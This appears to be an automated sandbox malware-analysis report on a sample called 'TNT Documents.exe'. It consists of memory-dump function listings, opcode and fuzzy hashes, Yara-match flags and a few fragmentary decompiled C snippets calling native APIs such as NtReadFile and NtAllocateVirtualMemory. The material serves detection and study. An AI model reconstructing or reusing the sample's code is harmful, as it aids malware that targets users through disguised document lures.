                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f2bbdf4577f269f4934f38886cd878382ae0046002c9f8cbb2f0cedb11b957bb
                                                                    • Instruction ID: 197e971f341e0c059ab01d58f7af65098363f304a7b971e38c943b6d4b6d8c35
                                                                    • Opcode Fuzzy Hash: f2bbdf4577f269f4934f38886cd878382ae0046002c9f8cbb2f0cedb11b957bb
                                                                    • Instruction Fuzzy Hash: 9D5268B1503B26EFD711CF14E4886A93BB1FB44328F918A0AD1615FAD4D3BC6986CF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06B10BE0, Relevance: .4, Instructions: 358COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.300885973.0000000006B10000.00000040.00000001.sdmp, Offset: 06B10000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c97b6ac79f436f6c7316f9f1c0d503e877bae33b70fd2a8a1c390f86b1b8e4e9
                                                                    • Instruction ID: 3db8cfe501b9ec7b96d9f7f2656305c3a1aa8d39c06f1538fea84beaa7e054b3
                                                                    • Opcode Fuzzy Hash: c97b6ac79f436f6c7316f9f1c0d503e877bae33b70fd2a8a1c390f86b1b8e4e9
                                                                    • Instruction Fuzzy Hash: 88D1AEB0B00604AFEBA9EB76C4507AAB7EAEF88700F5484ADD145CF294CF35E945CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 023699E0, Relevance: .3, Instructions: 265COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8f6c5df8eb389994d68dd52e3c28fd6f507b9e6ebdcdbd09e2ca6adfb5da900c
                                                                    • Instruction ID: f6eba142cf2c3e83f46404a1bdbbc3c2f9195229b5b3b7b003ed0f80edfc77a9
                                                                    • Opcode Fuzzy Hash: 8f6c5df8eb389994d68dd52e3c28fd6f507b9e6ebdcdbd09e2ca6adfb5da900c
                                                                    • Instruction Fuzzy Hash: E6A17A32E006198FCF15DFA5C8485AEBBBBFF85304B15856AE905BB224EB35E945CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E793D6, Relevance: .2, Instructions: 192COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2bbb5ed18f9e04b3aabae972dbd4c0654c655b4bb507b10426582ce75eedacd6
                                                                    • Instruction ID: 927a17aa459f412fd4e0905b07764e9389000eb50b11e8d2567be3916cc80a3c
                                                                    • Opcode Fuzzy Hash: 2bbb5ed18f9e04b3aabae972dbd4c0654c655b4bb507b10426582ce75eedacd6
                                                                    • Instruction Fuzzy Hash: 77815C74E152188FDB54CFA9D980A9EFBF2FF89300F2090A9D409A7356D7309A41CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E75150, Relevance: .2, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 327cae30f0e4f51303b1b42cc9aa23748a6baf838ce20a705080d7d15b91d1bc
                                                                    • Instruction ID: 91c17b598bbf29ed33bebbb624c376e511c06c794b59a50962bceec821798331
                                                                    • Opcode Fuzzy Hash: 327cae30f0e4f51303b1b42cc9aa23748a6baf838ce20a705080d7d15b91d1bc
                                                                    • Instruction Fuzzy Hash: 13711770E05619CFDB48CFA9C9809DEFBF2EF89210F24A42AD405B7214D7359A42CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E75160, Relevance: .2, Instructions: 179COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cef7435aaa8710db3e850b96993637c17f50759564ec63af653cbc9ad3e4815b
                                                                    • Instruction ID: 31f4382fe86fb384503cb5b27c1103b251964c449c7f527b34c3bbbfbdf7933d
                                                                    • Opcode Fuzzy Hash: cef7435aaa8710db3e850b96993637c17f50759564ec63af653cbc9ad3e4815b
                                                                    • Instruction Fuzzy Hash: 2271F570E05619DFDB44CFA9C9809DEFBF2EF89210F24A42AD405B7214D7359A41CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E73CE0, Relevance: .2, Instructions: 178COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7f6064e85ffb525ba49f637b9beabf0f6d742cafecc71fb0240e8a304e970c64
                                                                    • Instruction ID: c7dc6b6a60cfebbb72f45ca892b7fa1ed2c61bdfe0ea91665462300ed215d5ba
                                                                    • Opcode Fuzzy Hash: 7f6064e85ffb525ba49f637b9beabf0f6d742cafecc71fb0240e8a304e970c64
                                                                    • Instruction Fuzzy Hash: 4581DF74A152198FCB84CF99C5849DEFBF1FF88310F24A569E519AB324D330AA42CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E73CDF, Relevance: .2, Instructions: 170COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9551368a76fc2e5962b578e6045f5a754fe8b77135a1c4127ea9685d41f88f8b
                                                                    • Instruction ID: 2a755a75d66fe9878c0f01105ec039d99cab62165fa1d264bad6054a09a09906
                                                                    • Opcode Fuzzy Hash: 9551368a76fc2e5962b578e6045f5a754fe8b77135a1c4127ea9685d41f88f8b
                                                                    • Instruction Fuzzy Hash: 5471B074A112198FCB84CF99D5849DEFBF2FF88310B24A569D519AB320D330AA42CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E7AD08, Relevance: .2, Instructions: 164COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 527730da5279a70e4c99be6cfacf1ca0e25b2cd177a6b2edfe386ded98feec70
                                                                    • Instruction ID: 99a5ebc2fe3074fea5254efd25063ac8ad03cdbec06ceacc19a0ab75b6b5161c
                                                                    • Opcode Fuzzy Hash: 527730da5279a70e4c99be6cfacf1ca0e25b2cd177a6b2edfe386ded98feec70
                                                                    • Instruction Fuzzy Hash: 517129B4E11219CBDB54CFA9C980AADFBB6BB88304F24D069D908A7355DB309D81CF61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E719A8, Relevance: .2, Instructions: 163COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f7f7f60cf8b55ea2da7e634bf546cf0dbb9897c581f6e7a2f37ddfc7af18862a
                                                                    • Instruction ID: f2ba4b03195d8adaf5fb30af3669383870ab70835d93e97472ab527dcef7ee1b
                                                                    • Opcode Fuzzy Hash: f7f7f60cf8b55ea2da7e634bf546cf0dbb9897c581f6e7a2f37ddfc7af18862a
                                                                    • Instruction Fuzzy Hash: F861F274E0530ADFCB44CF99E5809EEBBB2FF88310F18916AE515A7214D3709A86CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E79A35, Relevance: .1, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc080fc6a6b2d9ee0f09b35cd1bebf44fef481218414702478deabdace34aa1e
                                                                    • Instruction ID: 3c1813e5a524ee7664ae9c8b0f6c425b66768fa1dd7d50e7e669f86c8e06a2cd
                                                                    • Opcode Fuzzy Hash: cc080fc6a6b2d9ee0f09b35cd1bebf44fef481218414702478deabdace34aa1e
                                                                    • Instruction Fuzzy Hash: 6A416A74E052198FDB98CFAAD9447DEBBF2FFC9200F14D0AAD408AB256E7305946CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E70006, Relevance: .1, Instructions: 112COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 16175a68aba56bff282500edb2b38607fb91af3bbf49fa4401697d7df8efb6cb
                                                                    • Instruction ID: 80a59deb05671f7ec2bc92fcbf7db098921e727dcb2d646add91988a1eaf70a6
                                                                    • Opcode Fuzzy Hash: 16175a68aba56bff282500edb2b38607fb91af3bbf49fa4401697d7df8efb6cb
                                                                    • Instruction Fuzzy Hash: 1A4119B0E057449FD749CF6BC84468EFBF3AFCA250F08D5A6C508AB265E73449468F62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E753F8, Relevance: .1, Instructions: 112COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0123ad65b73dce49bce8537a6ce7b7c8d71509197a06adca9b9c4167d833d0fb
                                                                    • Instruction ID: 64e0792e1883a92190d7f6f653e1688a250b95d883b057eff19d869c1cf55a5f
                                                                    • Opcode Fuzzy Hash: 0123ad65b73dce49bce8537a6ce7b7c8d71509197a06adca9b9c4167d833d0fb
                                                                    • Instruction Fuzzy Hash: D441F870E0520ADFDB44CFA9C5814EEFBB2BF88300F24D56AC419A7214E7309A52DF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E75408, Relevance: .1, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d9da3ffbeafe214d99c364dec8b2f507b86af87df76817b4304bf137e43de025
                                                                    • Instruction ID: 69b898690a87d493fbe67142ab095473df931b8c8754b262e20f53499c1269bb
                                                                    • Opcode Fuzzy Hash: d9da3ffbeafe214d99c364dec8b2f507b86af87df76817b4304bf137e43de025
                                                                    • Instruction Fuzzy Hash: C741F7B0E0520ADFDB44CFA9D5815EEFBB2BF88300F24D56AC419A7214E7309A52DF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E70040, Relevance: .1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2bd6d36b8fe6892265ea8339635b635343e87b5412565f9d821920825341f09a
                                                                    • Instruction ID: 37f715a85d413412910580878e93fb6f77bd4ba67b84bcf4941a92f42b2fd923
                                                                    • Opcode Fuzzy Hash: 2bd6d36b8fe6892265ea8339635b635343e87b5412565f9d821920825341f09a
                                                                    • Instruction Fuzzy Hash: CE310AB1E11618DFDB58CFABC84468EFBF3AFC8254F04D5AAC508A7228DB305A458F51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: TNT Documents.exe PID: 6400 Parent PID: 4548 TNT Documents.exeCOMMON

                                                                    Executed Functions

                                                                    Function 00418642, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73filenativeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 37%
                                                                    			E00418642(void* __edi) {

				_pop(ss);
				asm("adc bl, [0x29bbc9f1]");
				_t1 = __edi + 0x5e;
				 *_t1 =  *((char*)(__edi + 0x5e)) - 1;
				asm("ficomp dword [ebp+0x1e]");
				if ( *_t1 < 0) goto L3;
			}



                                                                    0x00418642
                                                                    0x00418643
                                                                    0x00418649
                                                                    0x00418649
                                                                    0x0041864c
                                                                    0x0041864f

                                                                    APIs
                                                                    • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: *9A$A:A
                                                                    • API String ID: 2738559852-3393056465
                                                                    • Opcode ID: 4810ea6e2f94facf85988b5b29332e51c1bc3a2305cc6e82dcbacff4f6941baf
                                                                    • Instruction ID: 8e57b21a112ab31d7c6b1d6ba0543481a0f6967f1ae2cad0eacb54953c2498bd
                                                                    • Opcode Fuzzy Hash: 4810ea6e2f94facf85988b5b29332e51c1bc3a2305cc6e82dcbacff4f6941baf
                                                                    • Instruction Fuzzy Hash: FF21E0B2204109ABDB18DF99DC94EEB77A9AF8C354F158249FA0DA7241C634E851CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041869A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: A:A
                                                                    • API String ID: 2738559852-2859176346
                                                                    • Opcode ID: 40b671ccacba2d23a778ba0ee767292e06d283ac9816c1099dbc126ef6d10228
                                                                    • Instruction ID: 1628b4857647c982ed4431088c360b56197b574895956c7edaea39bee45bd8c3
                                                                    • Opcode Fuzzy Hash: 40b671ccacba2d23a778ba0ee767292e06d283ac9816c1099dbc126ef6d10228
                                                                    • Instruction Fuzzy Hash: 6AF0F4B2200108ABCB14DF99DC80EEB77ADAF8C354F058249FE1D97241C630E851CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 37%
                                                                    			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				intOrPtr _t13;
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _t13 + 0xc48;
				E004191F0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t29))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4, _t28); // executed
				return _t18;
			}








                                                                    0x004186a3
                                                                    0x004186af
                                                                    0x004186b7
                                                                    0x004186bc
                                                                    0x004186e5
                                                                    0x004186e9

                                                                    APIs
                                                                    • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: A:A
                                                                    • API String ID: 2738559852-2859176346
                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                    • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                                                    • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                    • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004185EA, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 317a2c0b203aebd36da3fa286c0a94b2c6ad7ddb797753bcf1bbf841c9892b18
                                                                    • Instruction ID: 4f0e49c2477b0657c67c2fec6e7e8f619a0fbfa7b88b330f09787f3110a3306a
                                                                    • Opcode Fuzzy Hash: 317a2c0b203aebd36da3fa286c0a94b2c6ad7ddb797753bcf1bbf841c9892b18
                                                                    • Instruction Fuzzy Hash: EF01AFB2610208BFCB48CF98DC95EEB77A9AF8C754F158249FA0DD7241D630E855CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004187CB, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: fa9595a296a7c1b530e0e5178a9c926aa6abdc6992919f3d8a3cc550fb1eedaf
                                                                    • Instruction ID: 6f81bef43f40118dec1e844ade3b44a3cf3814683958c0aa511ea7938e4bdb01
                                                                    • Opcode Fuzzy Hash: fa9595a296a7c1b530e0e5178a9c926aa6abdc6992919f3d8a3cc550fb1eedaf
                                                                    • Instruction Fuzzy Hash: ABF01CB2200159AFDB14DF89CC95EE777A9FF8C354F158549FE5997241C630E810CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 628bb7ddc2d89bdd9a17dcf274af848d95d47d288e6c88dabe40ca1f2c3bcb85
                                                                    • Instruction ID: c91129677ccd3445505f46553bd5734fbe0161a2eaf1ebc3aa535d1cf1cd1d28
                                                                    • Opcode Fuzzy Hash: 628bb7ddc2d89bdd9a17dcf274af848d95d47d288e6c88dabe40ca1f2c3bcb85
                                                                    • Instruction Fuzzy Hash: A79002B128100412D1407199841474A0055B7D0341FD1C411A5054994ECA998DD576A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c17f5a24287e38a5ab15289429df620e2d40d0ed0063492d7a3536a80874fa03
                                                                    • Instruction ID: 5d7221135309caf0b1d2c9bffe09f19417c3f68f1ef50c622b56eddde0153ef5
                                                                    • Opcode Fuzzy Hash: c17f5a24287e38a5ab15289429df620e2d40d0ed0063492d7a3536a80874fa03
                                                                    • Instruction Fuzzy Hash: 0D9002A13C100452D10071998424B0A0055F7E1341FD1C415E1054994DCA59CC527166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 738f9b4d780692abea6dadd2ee1aa56ca7b6cb47d737d262b453cdb39114fe07
                                                                    • Instruction ID: e83c64312eead5accb20eb9df783b020dccb29a71a7a2d2b4f5d2edc26d53456
                                                                    • Opcode Fuzzy Hash: 738f9b4d780692abea6dadd2ee1aa56ca7b6cb47d737d262b453cdb39114fe07
                                                                    • Instruction Fuzzy Hash: 619002612C2041625545B199841450B4056B7E02817D1C412A1404D90CC9669856E661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 98ff1b4205bb89f4e5b42683acc5a11dc4335c1e599d3e30bba2c49424b837ce
                                                                    • Instruction ID: 5859b99281f828752c0d5765cc6cc97928a0976b74ca719c45b15be1f318f2e6
                                                                    • Opcode Fuzzy Hash: 98ff1b4205bb89f4e5b42683acc5a11dc4335c1e599d3e30bba2c49424b837ce
                                                                    • Instruction Fuzzy Hash: 1390027128100423D1117199851470B0059B7D0281FD1C812A0414998DDA968952B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015998F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fa4b11f262cf179507731785769d282923e3d9cead4b8e015d08a5a21bb0d131
                                                                    • Instruction ID: a5ede072187105cdbd60e27a7684531511e697a23bdbf04d864790ca11ae15df
                                                                    • Opcode Fuzzy Hash: fa4b11f262cf179507731785769d282923e3d9cead4b8e015d08a5a21bb0d131
                                                                    • Instruction Fuzzy Hash: 8890026168100512D1017199841461A005AB7D0281FD1C422A1014995ECE658992B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
